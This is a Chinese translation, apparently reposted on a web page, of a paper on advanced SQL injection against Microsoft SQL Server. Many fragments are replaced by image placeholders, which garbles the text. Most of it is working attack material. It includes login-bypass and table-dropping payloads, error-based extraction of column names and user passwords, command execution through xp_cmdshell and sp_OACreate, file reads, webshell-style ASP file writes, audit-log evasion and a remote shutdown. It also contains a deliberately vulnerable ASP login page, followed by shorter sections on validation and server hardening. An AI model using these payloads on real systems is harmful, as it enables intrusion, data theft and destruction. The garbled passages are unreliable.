sqlserver高级技术:SQL Server应用程序中的高级SQL注入来源: 发布时间:星期四, 2009年2月12日 浏览:136次 评论:0
摘要: 这份文档是详细讨论SQL注入技术 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 这份文档 ![]() ![]() ![]() ![]() ![]() ![]() ![]() 介绍: SQL是 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 当 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Select id,forename,surname from authors 这条语句将返回authors表中所有行 ![]() ![]() ![]() ![]() Select id,forename,surname from authors where forename\'john\' and surname=\'smith\' 需要着重指明 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 如下: Forename:jo\'hn Surname:smith 查询语句变为: Select id,forename,surname from authors where forename=\'jo\'hn\' and surname=\'smith\' 当数据库试图去执行这个查询时 ![]() ![]() Server:Msg 170, Level 15, State 1, Line 1 Line 1:Incorrect syntax near \'hn\' 造成这种结果 ![]() ![]() ![]() ![]() ![]() ![]() Forename:jo\';drop table authors— Surname: 结果是authors表被删除 ![]() ![]() ![]() 看上去好象通过从输入中去掉单引号或者通过某些思路方法避免它们都可以解决这个问题 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Select id,forename,surname from authors where id=1234 在这种情况下 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 我们更进 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 这是 ![]() ![]() ![]() <HTML> <HEAD> <TITLE>Login Page</TITLE> </HEAD> <BODY bgcolor=\'000000\' text=\'cccccc\'> <FONT Face=\'tahoma\' color=\'cccccc\'> <CENTER><H1>Login</H1> <FORM action=\'process_loginasp\' method=post> <TABLE> <TR><TD>Username:</TD><TD><INPUT type=text name=username size=100 width=100></TD></TR> <TR><TD>Password:</TD><TD><INPUT type=password name=password size=100 withd=100></TD></TR> </TABLE> <INPUT type=submit value=\'Submit\'><INPUT type=re ![]() ![]() </FORM> </Font> </BODY> </HTML> 下面是process_login.asp ![]() ![]() ![]() <HTML> <BODY bgcolor=\'000000\' text=\'ffffff\'> <FONT Face=\'tahoma\' color=\'ffffff\'> <STYLE> p { font-size=20pt ! important} font { font-size=20pt ! important} h1 { font-size=64pt ! important} </STYLE> <%@LANGUAGE = JScript %> <% function trace( str ) { ![]() ![]() Response.write( str ); } function Login( cn ) { var username; var password; username = Request.form("username"); password = Request.form("password"); var rso = Server.CreateObject("ADODB.Record ![]() var sql = "select * from users where username = \'" + username + "\' and password = \'" + password + "\'"; trace( "query: " + sql ); rso.open( sql, cn ); ![]() rso.close ![]() %> <FONT Face=\'tahoma\' color=\'cc0000\'> <H1> <BR><BR> <CENTER>ACCESS DENIED</CENTER> </H1> </BODY> </HTML> <% Response.end ![]() ![]() Session("username") = "" + rso("username"); %> <FONT Face=\'tahoma\' color=\'00cc00\'> <H1> <CENTER>ACCESS GRANTED<BR> <BR> Welcome, <% Response.write(rso("Username")); Response.write( "</BODY></HTML>" ); Response.end } } function Main ![]() var username var cn = Server.createobject( "ADODB.Connection" ); cn.connectiontimeout = 20; cn.open( "localserver", "sa", "password" ); username = ![]() ![]() Login( cn ); } cn.close ![]() } Main ![]() %> 出现问题 ![]() ![]() Var sql="select * from users where username=\'"+username+"\' and password=\'"+password+"\'"; 如果用户输入 ![]() Username:\';drop table users— Password: 数据库中表users将被删除 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 攻击者可以只需提供他们知道 ![]() ![]() ![]() Username:admin\'— 攻击者可以使用users表中第 ![]() ![]() Username:\' or 1=1— 更特别地 ![]() ![]() ![]() Username:\' union select 1,\'fictional_user\',\'some_password\',1— 这种结果 ![]() ![]() ![]() ![]() ![]() ![]() 通过 ![]() 这个几乎是David Litchfield首先发现 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 为了操作数据库中 ![]() ![]() ![]() ![]() Create talbe users( Id ![]() Username varchar(255), Password varchar(255), Privs ![]() ) 然后将下面 ![]() Insert ![]() Insert ![]() Insert ![]() Insert ![]() 如果我们 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 幸运地 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() (下面以 ![]() ![]() ![]() 首先 ![]() ![]() ![]() ![]() ![]() ![]() ![]() Username:\' having 1=1— 这样将会出现如下 ![]() Microsoft OLE DB Provider for ODBC Drivers error \'80040e14\' [Microsoft][ODBC SQL Server Driver][SQL Server]Column \'users.id\' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /process_login.asp, line 35 因此现在攻击者知道了表 ![]() ![]() ![]() ![]() ![]() ![]() ![]() Username:\' group by users.id having 1=1— 出现 ![]() ![]() Microsoft OLE DB Provider for ODBC Drivers error \'80040e14\' [Microsoft][ODBC SQL Server Driver][SQL Server]Column \'users.username\' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35 最终攻击者得到了username字段后: ‘ group by users.id,users.username,users.password,users.privs having 1=1— 这句话并不产生 ![]() ![]() select * from users where username=\'\' 因此攻击者现在知道查询涉及users表 ![]() ![]() 能够确定每个列 ![]() ![]() ![]() ![]() Username:\' union select sum(username) from users— 这利用了SQLSERVER在确定两个结果集 ![]() ![]() Microsoft OLE DB Provider for ODBC Drivers error \'80040e07\' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /process_login.asp, line 35 这告诉了我们\'username\'字段 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Username:\' union select sum(id) from users— Microsoft OLE DB Provider for ODBC Drivers error \'80040e14\' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /process_login.asp, line 35 我们可以用这种技术近似地确定数据库中任何表中 ![]() ![]() ![]() 这样攻击者就可以写 ![]() ![]() ![]() Username:\';insert ![]() 这种技术 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() select * from master ..sysmessages 解释这些将实现有趣 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Username:\' union select @@version,1,1,1— Microsoft OLE DB Provider for ODBC Drivers error \'80040e07\' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value \'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition _disibledevent=> /process_login.asp, line 35 这句尝试去将内置 ![]() ![]() ![]() ![]() ![]() ![]() ![]() 这种技术可以用来读取数据库中任何表 ![]() ![]() ![]() ![]() Username:\' union select min(username),1,1,1 from users where username>\'a\'— 这句选择users表中username大于\'a\'中 ![]() ![]() ![]() Microsoft OLE DB Provider for ODBC Drivers error \'80040e07\' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value \'admin\' to a column of data type ![]() /process_login.asp, line 35 因此攻击者已经知道用户admin是存在 ![]() ![]() ![]() ![]() ![]() Username:\' union select min(username),1,1,1 from users where username>\'admin\'— Microsoft OLE DB Provider for ODBC Drivers error \'80040e07\' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value \'chris\' to a column of data type ![]() /process_login.asp, line 35 ![]() ![]() Username:\' union select password,1,1,1 from users where username=\'admin\'— Microsoft OLE DB Provider for ODBC Drivers error \'80040e07\' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value \'r00tr0x!\' to a column of data type ![]() /process_login.asp, line 35 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() begin declare @ret varchar(8000) ![]() select @ret=@ret+\' \'+username+\'/\'+password from users where username>@ret select @ret as ret ![]() end 攻击者使用这个当作用户名登陆(都在 ![]() Username: \'; begin declare @ret varchar(8000) ![]() ![]() 这就创建了 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 然后攻击者就可以取得我们要得到 ![]() ![]() Username:\' union select ret,1,1,1 from foo— Microsoft OLE DB Provider for ODBC Drivers error \'80040e07\' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value \': admin/r00tr0x! guest/guest chris/password fred/sesame\' to a column of data type ![]() /process_login.asp, line 35 然后丢弃(删除)表来清楚脚印: Username:\'; drop table foo— 这个例子仅仅是这种技术 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 获得更高 ![]() ![]() ![]() ![]() ![]() 1. 在数据库服务器上 ![]() ![]() 2. 利用xp_regread扩展存储过程去读注册表 ![]() ![]() ![]() 3. 利用其他存储过程去改变服务器 4. 在连接 ![]() 5. 创建客户扩展存储过程去在SQLSERVER进程中执行溢出代码 6. 使用\'bulk insert\'语法去读服务器上 ![]() 7. 使用bcp在服务器上建立任意 ![]() ![]() 8. 使用sp_OACreate,sp_OAMethod和sp_OAGetProperty系统存储过程去创建ActiveX应用 ![]() ![]() ![]() 这些只列举了非常普通 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() [xp_cmdshell] 许多存储过程被创建在SQLSERVER中 ![]() ![]() ![]() ![]() Xp_cmdshell是 ![]() ![]() ![]() ![]() ![]() Exec master..xp_cmdshell \'dir\' 将获得SQLSERVER进程 ![]() ![]() ![]() Exec master..xp_cmdshell \'net user\' 将提供服务器上所有用户 ![]() ![]() ![]() ![]() ![]() [xp_regread] 另 ![]() ![]() ![]() ![]() ![]() Xp_regaddmulti ![]() Xp_regdeletekey Xp_regdeletevalue Xp_regenumkeys Xp_regenumvalues Xp_regread Xp_regremovemulti ![]() Xp_regwrite 这些 ![]() ![]() exec xp_regread HKEY_LOCAL_MACHINE,\'SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\', \'nullsessionshares\' 这将确定什么样 ![]() ![]() exec xp_regenumvalues HKEY_LOCAL_MACHINE,\'SYSTEM\\CurrentControlSet\\Services\\snmp\\parameters\\validcommunities\' 这将显示服务器上所有SNMP团体配置 ![]() ![]() ![]() ![]() ![]() ![]() ![]() 这很容易想象到 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() [其他存储过程] xp_servicecontrol过程允许用户启动 ![]() ![]() exec master..xp_servicecontrol \'start\',\'schedule\' exec master..xp_servicecontrol \'start\',\'server\' 下表中列出了少量 ![]() ![]() Xp_availablemedia 显示机器上有用 ![]() Xp_dirtree 允许获得 ![]() Xp_enumdsn 列举服务器上 ![]() Xp_loginconfig Reveals information about the security mode of the server Xp_makecab 允许用户在服务器上创建 ![]() Xp_ntsec_enumdo ![]() ![]() Xp_terminate_process 提供进程 ![]() ![]() [Linked Servers] SQL SERVER提供了 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() [Custom extended stored procedures] 扩展存储过程应用 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Sp_addextendedproc \'xp_webserver\',\'c:\\temp\\xp_foo.dll\' 在正常 ![]() ![]() exec xp_webserver ![]() ![]() ![]() ![]() xp_dropextendedproc \'xp_webserver\' [将文本文件导入表] 使用\'bulk insert\'语法可以将 ![]() ![]() ![]() create table foo( line varchar(8000) ) 然后执行bulk insert操作把文件中 ![]() ![]() bulk insert foo from \'c:\\inetpub\\wwwroot\\process_login.asp\' 可以使用上述 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() [使用bcp建立文本文件] 使用\'bulk insert\' ![]() ![]() ![]() ![]() ![]() 既然 bcp可以从SQL服务进程外访问数据库 ![]() ![]() ![]() ![]() ![]() 命令行格式如下: bcp "select * from text..foo" queryout c:\\inetpub\\wwwroot\\runcommand.asp –c -Slocalhost –Usa –Pfoobar \'S\'参数为执行查询 ![]() ![]() ![]() ![]() [ActiveX automation scripts in SQL SERVER] SQL SERVER中提供了几个内置 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() (1)这个例子使用\'wscript.shell\'对象建立了 ![]() ![]() wscript.shell example declare @o ![]() exec sp_oacreate \'wscript.shell\',@o out exec sp_oamethod @o,\'run\',NULL,\'notepad.exe\' 我们可以通过指定在用户名后面来执行它: Username:\'; declare @o ![]() (2)这个例子使用\'scripting.filesystemobject\'对象读 ![]() ![]() --scripting.filesystemobject example – read a known file declare @o ![]() ![]() ![]() ![]() declare @line varchar(8000) exec sp_oacreate \'scripting.filesystemobject\', @o out exec sp_oamethod @o, \'opentextfile\', @f out, \'c:\\boot.ini\', 1 exec @ret=sp_oamethod @f,\'readline\',@line out while(@ret=0) begin pr ![]() exec @ret=sp_oamethod @f,\'readline\',@line out end (3)这个例子创建了 ![]() ![]() -- scripting.filesystemobject example – create a \'run this\'.asp file declare @o ![]() ![]() ![]() ![]() exec sp_oacreate \'scripting.filesystemobject\',@o out exec sp_oamethod @o,\'createtextfile\',@f out,\'c:\\inetpub\\wwwroot\\foo.asp\',1 exec @ret=sp_oamethod @f,\'writeline\',NULL,\'<% ![]() ![]() 需要指出 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() (4)这些例子阐述了这个技术 ![]() declare @o ![]() ![]() exec sp_oacreate \'speech.voicetext\',@o out exec sp_oamethod @o,\'register\',NULL,\'foo\',\'bar\' exec sp_oa ![]() exec sp_oamethod @o,\'speak\',NULL,\'all your sequel servers are belong to,us\',528 waitfor delay \'00:00:05\' 我们可以在我们假定 ![]() ![]() ![]() ![]() ![]() Username:admin\';declare @o ![]() ![]() ![]() [存储过程] 传说如果 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 本质上 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 比较好 ![]() ![]() ?如果 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ?如果 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 明显地 ![]() ![]() ![]() ![]() ![]() ![]() 为了阐明存储过程 ![]() ![]() sp_who \'1\' select * from sysobjects or sp_who \'1\';select * from sysobjects 任何 ![]() ![]() ![]() ![]() ![]() [高级SQL注入] 通常情况下 ![]() ![]() ![]() ![]() ![]() ![]() ![]() 在这部分 ![]() ![]() ![]() ![]() ![]() [没有单引号 ![]() ![]() 有时候开发人员会通过过滤所有 ![]() ![]() ![]() ![]() ![]() function escape(input) input=replace(input,"\'","\'\'") escape=input end function 无可否认地这防止了我们所有例子 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 如果攻击者想不使用单引号产生 ![]() ![]() ![]() ![]() ![]() insert ![]() char(0x63)+char(0x68)+char(0x72)+char90x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char90x69)+char(0x73), 0xffff) 这就是 ![]() ![]() ![]() ![]() ![]() 淡然 ![]() ![]() ![]() ![]() insert ![]() 123, 123, oxffff) SQL SERVER自动地将整型转化为varchar型 ![]() ![]() [Second-Order SQL Injection] 即使应用 ![]() ![]() ![]() ![]() ![]() 例如 ![]() ![]() ![]() Username:admin\'— Password:password 应用 ![]() ![]() ![]() ![]() insert ![]() 我们假设应用 ![]() ![]() ![]() ![]() ![]() ![]() username = escape( Request.form("username") ); oldpassword = escape( Request.form("oldpassword") ); ![]() ![]() var rso = Server.CreateObject("ADODB.Record ![]() var sql = "select * from users where username = \'" + username + "\' and password = \'" + oldpassword + "\'"; rso.open( sql, cn ); ![]() { … 设置新密码 ![]() sql = "update users ![]() ![]() rso("username")为登陆查询中返回 ![]() 当username为admin\'—时 ![]() update users ![]() 这样攻击者可以通过注册 ![]() ![]() ![]() ![]() ![]() 这是 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() O\'Brien 从 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 如果攻击者不使用任何应用 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() response.end 或者类似 ![]() ![]() [长度限制] 为了给攻击者更多 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Username:\';shutdown— 这样只用12个输入 ![]() ![]() ![]() drop table <tablename> 如果限定长度是在过滤 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Username:aaaaaaaaaaaaaaa\' Password:\'; shutdown— 原因是应用 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() select * from users where username=\'aaaaaaaaaaaaaaa\'\' and password=\'\'\';shutdown— 实际上 ![]() ![]() aaaaaaaaaaaaaaa\' and password=\' 因此最后 ![]() ![]() [审计] SQL SERVER包含了丰富 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Sp_password 到 ![]() ![]() --\'sp_password\' was found in the text of this event. -- The text has been replaced with this comment for security reasons. 这种行为发生在所有 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 因此 ![]() ![]() ![]() ![]() Username:admin\'—sp_password 事实上 ![]() ![]() ![]() ![]() [防范] 这部分讨论针对记述 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() [输入验证] 输入验证是 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 下面是 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 区别 ![]() 1) 努力修改数据使它成为正确 ![]() 2) 拒绝被认为是 ![]() ![]() 3) 只接收被认为是正确 ![]() 第 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 第 2种情况也存在第 ![]() ![]() ![]() ![]() ![]() ![]() 第 3种情况可能是 3种中最好 ![]() ![]() ![]() 从安全角度看合并第 2种思路方法和第 3种思路方法可能是最好 ![]() ![]() ![]() ![]() ![]() ![]() 带有连接符号 ![]() ![]() ![]() ![]() ![]() Quentin Bassington-Bassington 我们必须在正确输入中允许连接符号 ![]() ![]() ![]() 当合并修改数据和 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() uni\'on sel\'ect @@version-\'- 既然单引号被除去 ![]() ![]() ![]() ![]() ![]() ![]() 这有 ![]() ![]() 思路方法 ![]() function escape(input) input=replace(input,"\'","\'\'") escape=input end function 思路方法 2——拒绝已知 ![]() ![]() function validate_ ![]() known_bad= validate_ ![]() for i=lbound(known_bad) to ubound(known_bad) ![]() validate_ ![]() exit function end ![]() next end function 思路方法 3——只允许正确 ![]() function validatepassword(input) good_password_chars=” abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789” validatepassword=true for i=1 to len(input) c=mid(input,I,1) ![]() validatepassword=false exit function end ![]() next end function [SQL SERVER锁定] 在这指出 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 1.确定连接服务器 ![]() a.确定你所使用 ![]() ![]() ![]() 2.确定哪些帐户是存在 ![]() a.为应用 ![]() ![]() ![]() ![]() b.删除不必要 ![]() c.确定所有帐户有强壮 ![]() 3.确定哪些对象存在 a.许多扩展存储过程能被安全地移除 ![]() ![]() ![]() b.移除所有举例数据库——例如\'northwind\'和\'pubs\'数据库 4.确定哪写帐户能过使用哪些对象 a.应用 ![]() ![]() ![]() ![]() 5.确定服务器 ![]() a.针对SQL SERVER有 ![]() ![]() ![]() ![]() ![]() ![]() ![]() 6.确定什么应该被日志记录 ![]() ![]() [参考文献] [1] Web Application Disassembly with ODBC Error Messages, David Litchfield http://www.nextgenss.com/papers/webappdis.doc [2] SQL Server Security Checklist http://www.sqlsecurity.com/checklist.asp [3] SQL Server 2000 Extended Stored Procedure Vulnerability http://www.atstake.com/research/advisories/2000/a120100-2.txt [4] Microsoft SQL Server Extended Stored Procedure Vulnerability http://www.atstake.com/research/advisories/2000/a120100-1.txt [5] Multiple Buffer Format String Vulnerabilities In SQL Server http://www.microsoft.com/technet/security/bulletin/MS01-060.asp http://www.atstake.com/research/advisories/2001/a122001-1.txt 0
相关文章读者评论发表评论 |